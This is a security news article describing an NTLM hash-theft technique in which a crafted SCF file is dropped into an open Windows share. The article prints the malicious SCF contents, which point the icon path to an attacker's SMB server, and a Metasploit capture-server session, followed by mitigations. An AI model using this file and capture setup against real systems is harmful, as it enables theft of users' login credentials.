Sunday, October 6, 2024
HomePassword AttacksHackers Can Steal Your Windows Login Credential Without User Interaction using New...

Hackers Can Steal Your Windows Login Credential Without User Interaction using New Windows OS Flow

Published on

Newly discovered dangerous Vulnerability in NTLM Architecture allows hackers to steal Windows NTLM password without any user interaction in all the  Recent Version Windows OS.

NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN), an older Microsoft product.

This vulnerability allows attackers can able to steal the NTLM hashes remotely without any user interaction using malicious SCF file that has to be placed in unprotected users windows machine.

- Advertisement - EHA
NTLM

This vulnerability has 100% attack vector for users who have unprotected shared folder without a password. share folder protected users are safe by this dangerous attack and since windows have default shared folder protection will protect most of the WIndows user.

Worst case is that, this is normal behavior in offices, schools, hospitals and almost all Windows environments, people share folders left open to sharing music, photos, and documents.

How Does Hackers Steal the NTLM hashes

Initially, the attacker will discover the unprotected share folder target victim machine and share the malicious  SCF file(Shell Command File)  to execute some basic tasks.

Since we already have few of  SCF file attacks which required manual user interaction to successfully execute the SCF file for Performing some malicious activities but this flow has required no user interaction.

Here Attacker can be used some traditional method via email to send the malicious SCF file and install into victim machine.

Basic SCF File structure that contains the shell. command file share ad task bar information

Command=2
IconFile=\\192.168.1.101\share\test.ico
[Taskbar]
Command=ToggleDesktop

This Malicious SCF File will be executed using the Metasploit module to capture the NTLM hash form the victim’s machine.

root@sysadminjd:~# cat test.scf
[Shell]
Command=2
IconFile=\\192.168.1.111\share\test.ico
[Taskbar]
Command=ToggleDesktop
root@sysadminjd:~#
root@sysadminjd:~# msfconsole -q
msf >use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt
JOHNPWFILE = /tmp/smbhash.txt
msf auxiliary(smb) > exploit -j
[*] Auxiliary module running as background job
[*] Server started.

Once attackers Craft the NTLM hash form the Victims machine they will use some Public availble tool such as John the Ripper  to crack the NTLM  hashes and redrive the Windows Login Credentials.

According to the  Researcher,Diego who Discovered this critical vulnerability have suggested some useful mitigation techniques.

  1. Microsoft created a sort of patch to this vulnerability consisting in changing two registry keys to disable NTLM on the system. This registry keys are available only on Windows 10 and Windows Server 2016, and Microsoft has no intentions to backport to the other versions.
  2. Another issue is that disabling NTLM will break a lot of environments, and that’s a huge concern for them.
  3. My suggestion is to use strong passwords, after the attack we need to crack the hash, that can take a lot of time if the password is complex, and can be frustrating for the attacker.
  4. The better approach, don’t share folders without passwords, that’ll do the trick.
 

He has been reported this vulnerability on MAY 2017 and  finally Microsoft patch this Vulnerability in Oct 2017.

The patch is only for Windows 10 and Windows Server 2016 users. Older Windows versions remain vulnerable to this attack because the registry modifications are not compatible with older versions of the Windows Firewall.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Prince Ransomware Hits UK and US via Royal Mail Phishing Scam

A new ransomware campaign targeting individuals and organizations in the UK and the US...

Microsoft, DOJ Dismantle Domains Used by Russian FSB-Linked Hacking Group

Microsoft and the U.S. Department of Justice (DOJ) have successfully dismantled a network of...

Cloud Penetration Testing Checklist – 2024

Cloud Penetration Testing is a method of actively checking and examining the Cloud system...

Linux Malware perfctl Attacking Millions of Linux Servers

Researchers have uncovered a sophisticated Linux malware, dubbed "perfctl," actively targeting millions of Linux...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

10 Best WiFi Hacking Apps for Android – 2024 Edition

In this article, we are sharing the top “Wi-Fi hacking Apps“ for Android applicants....

Brutespray – Port Scanning and Automated Brute Force Tool

Brutespray is a Python script that provides a combination of both port scanning and automated...

fsociety a Complete Hacking Tools pack that a Hacker Needs – Penetration Testing Framework

fsociety is a penetration testing framework that consists of all penetration testing tools that...